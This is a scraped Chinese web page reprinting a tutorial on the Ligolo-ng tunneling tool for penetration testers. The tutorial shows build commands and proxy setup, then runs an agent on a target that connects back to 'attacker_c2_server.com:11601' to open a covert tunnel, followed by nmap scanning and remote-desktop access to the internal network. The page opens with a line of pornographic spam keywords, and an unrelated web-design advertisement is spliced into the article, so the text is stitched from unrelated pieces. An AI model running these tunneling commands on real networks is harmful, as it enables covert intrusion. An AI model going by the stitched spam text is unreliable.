日韩无码专区无码一级三级片|91人人爱网站中日韩无码电影|厨房大战丰满熟妇|AV高清无码在线免费观看|另类AV日韩少妇熟女|中文日本大黄一级黄色片|色情在线视频免费|亚洲成人特黄a片|黄片wwwav色图欧美|欧亚乱色一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何使用Ligolo-ng建立隱蔽的通信信道

關(guān)于Ligolo-ng

Ligolo-ng是一款高級信道工具,該工具基于TUN接口實現(xiàn)其功能。Ligolo-ng是一款輕量級的快速工具,可以幫助廣大滲透測試人員利用反向TCP/TLS連接建立一條隱蔽的通信信道,而且無需SOCKS支持。

成都創(chuàng)新互聯(lián)主營內(nèi)丘網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營網(wǎng)站建設(shè)方案,成都app開發(fā),內(nèi)丘h5小程序設(shè)計搭建,內(nèi)丘網(wǎng)站營銷推廣歡迎內(nèi)丘等地區(qū)企業(yè)咨詢

功能介紹

  • Tun接口(不再需要SOCKS);
  • 簡單的UI界面,支持選擇代理和網(wǎng)絡(luò)信息;
  • 易于使用,易于安裝;
  • 基于Let’s Encrypt的自動化證書配置;
  • 高性能(多路復(fù)用);
  • 不需要高級權(quán)限;
  • 套接字監(jiān)聽/代理綁定;
  • 多平臺代理支持;

工具構(gòu)建

(1) 構(gòu)建Ligolo-ng

 
 
    
  
  
  1. $ go build -o agent cmd/agent/main.go  
    2.   
  
  2. $ go build -o proxy cmd/proxy/main.go  
    3.   
  
  3. # Build agent for Windows  
    4.   
  
  4. $ GOOS=windows go build -o agent.exe cmd/agent/main.go 
    5.

(2) 安裝Ligolo-ng

我們需要在自己的命令控制服務(wù)器上開啟代理服務(wù),默認(rèn)使用11601端口監(jiān)聽:

 
 
    
  
  
  1. $ sudo ip tuntap add user [your_username] mode tun ligolo 
    2.   
  
  2. $ sudo ip link set ligolo up 
    3.   
  
  3. $ ./proxy -h # Help options 
    4.   
  
  4. $ ./proxy -autocert # Automatically request LetsEncrypt certificates 
    5.

工具使用

首先,我們需要在目標(biāo)設(shè)備上啟動代理(無需特殊權(quán)限):

 
 
    
  
  
  1. $ ./agent -connect attacker_c2_server.com:11601 
    2.

此時,代理服務(wù)器上將出現(xiàn)一條會話鏈接:

 
 
    
  
  
  1. INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000" 
    2.

使用“session”命令選擇代理:

 
 
    
  
  
  1. ligolo-ng ? session 
    2.   
  
  2.  
    3.   
  
  3. ? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000 
    4.

使用“ifconfig”命令顯示代理的網(wǎng)絡(luò)配置信息:

 
 
    
  
  
  1. [Agent : nchatelain@nworkstation] ? ifconfig 
    2.   
  
  2.  
    3.   
  
  3. [...] 
    4.   
  
  4.  
    5.   
  
  5. ┌─────────────────────────────────────────────┐ 
    6.   
  
  6.  
    7.   
  
  7. │ Interface 3                                 │ 
    8.   
  
  8.  
    9.   
  
  9. ├──────────────┬──────────────────────────────┤ 
    10.   
  
  10.  
    11.   
  
  11. │ Name         │ wlp3s0                       │ 
    12.   
  
  12.  
    13.   
  
  13. │ Hardware MAC │ de:ad:be:ef:ca:fe            │ 
    14.   
  
  14.  
    15.   
  
  15. │ MTU          │ 1500                         │ 
    16.   
  
  16.  
    17.   
  
  17. │ Flags        │ up|broadcast|multicast       │ 
    18.   
  
  18.  
    19.   
  
  19. │ IPv4 Address │ 192.168.0.30/24             │ 
    20.   
  
  20.  
    21.   
  
  21. └──────────────┴──────────────────────────────┘ 
    22.

在代理/中繼服務(wù)器上添加一條指向192.168.0.0/24代理網(wǎng)絡(luò)的路由:

 
 
    
  
  
  1. $ sudo ip route add 192.168.0.0/24 dev ligolo 
    2.

最后,在代理上開啟一條通信信道:

 
 
    
  
  
  1. [Agent : nchatelain@nworkstation] ? start 
    2.   
  
  2.  
    3.   
  
  3. [Agent : nchatelain@nworkstation] ? INFO[0690] Starting tunnel to nchatelain@nworkstation    
    4.

現(xiàn)在,你就可以通過代理服務(wù)器訪問192.168.0.0/24代理網(wǎng)絡(luò):

 
 
    
  
  
  1. $ nmap 192.168.0.0/24 -v -sV -n 
    2.   
  
  2.  
    3.   
  
  3. [...] 
    4.   
  
  4.  
    5.   
  
  5. $ rdesktop 192.168.0.123 
    6.   
  
  6.  
    7.   
  
  7. [...] 
    8.

支持的協(xié)議/數(shù)據(jù)包

  • TCP
  • UDP
  • ICMP

性能

在Ligolo-ng的幫助下,你可以輕松達(dá)到100 Mbits/秒的速度。下面給出的測試結(jié)果是在一臺200Mbits/s服務(wù)器上使用iperf測試的一條200Mbits/s的鏈接:

 
 
    
  
  
  1. $ iperf3 -c 10.10.0.1 -p 24483 
    2.   
  
  2.  
    3.   
  
  3. Connecting to host 10.10.0.1, port 24483 
    4.   
  
  4.  
    5.   
  
  5. [  5] local 10.10.0.224 port 50654 connected to 10.10.0.1 port 24483 
    6.   
  
  6.  
    7.   
  
  7. [ ID] Interval           Transfer     Bitrate         Retr  Cwnd 
    8.   
  
  8.  
    9.   
  
  9. [  5]   0.00-1.00   sec  12.5 MBytes   105 Mbits/sec    0    164 KBytes        
    10.   
  
  10.  
    11.   
  
  11. [  5]   1.00-2.00   sec  12.7 MBytes   107 Mbits/sec    0    263 KBytes        
    12.   
  
  12.  
    13.   
  
  13. [  5]   2.00-3.00   sec  12.4 MBytes   104 Mbits/sec    0    263 KBytes        
    14.   
  
  14.  
    15.   
  
  15. [  5]   3.00-4.00   sec  12.7 MBytes   106 Mbits/sec    0    263 KBytes        
    16.   
  
  16.  
    17.   
  
  17. [  5]   4.00-5.00   sec  13.1 MBytes   110 Mbits/sec    2    134 KBytes        
    18.   
  
  18.  
    19.   
  
  19. [  5]   5.00-6.00   sec  13.4 MBytes   113 Mbits/sec    0    147 KBytes        
    20.   
  
  20.  
    21.   
  
  21. [  5]   6.00-7.00   sec  12.6 MBytes   105 Mbits/sec    0    158 KBytes        
    22.   
  
  22.  
    23.   
  
  23. [  5]   7.00-8.00   sec  12.1 MBytes   101 Mbits/sec    0    173 KBytes        
    24.   
  
  24.  
    25.   
  
  25. [  5]   8.00-9.00   sec  12.7 MBytes   106 Mbits/sec    0    182 KBytes        
    26.   
  
  26.  
    27.   
  
  27. [  5]   9.00-10.00  sec  12.6 MBytes   106 Mbits/sec    0    188 KBytes        
    28.   
  
  28.  
    29.   
  
  29. - - - - - - - - - - - - - - - - - - - - - - - - - 
    30.   
  
  30.  
    31.   
  
  31. [ ID] Interval           Transfer     Bitrate         Retr 
    32.   
  
  32.  
    33.   
  
  33. [  5]   0.00-10.00  sec   127 MBytes   106 Mbits/sec    2             sender 
    34.   
  
  34.  
    35.   
  
  35. [  5]   0.00-10.08  sec   125 MBytes   104 Mbits/sec                  receiver 
    36.

注意事項

由于代理并不是以高級權(quán)限運行的,因此無法轉(zhuǎn)發(fā)原始數(shù)據(jù)包。當(dāng)你執(zhí)行“NMAP SYN-SCAN”的時候,代理上會執(zhí)行一次TCP connect()。

在使用Nmap時,你應(yīng)該使用“--unprivileged”或“-PE”以避免假陽性。

工具使用演示

視頻地址:【點我觀看】

項目地址

Ligolo-ng:【GitHub傳送門】


本文題目:如何使用Ligolo-ng建立隱蔽的通信信道
文章鏈接:http://www.5511xx.com/article/coggeoj.html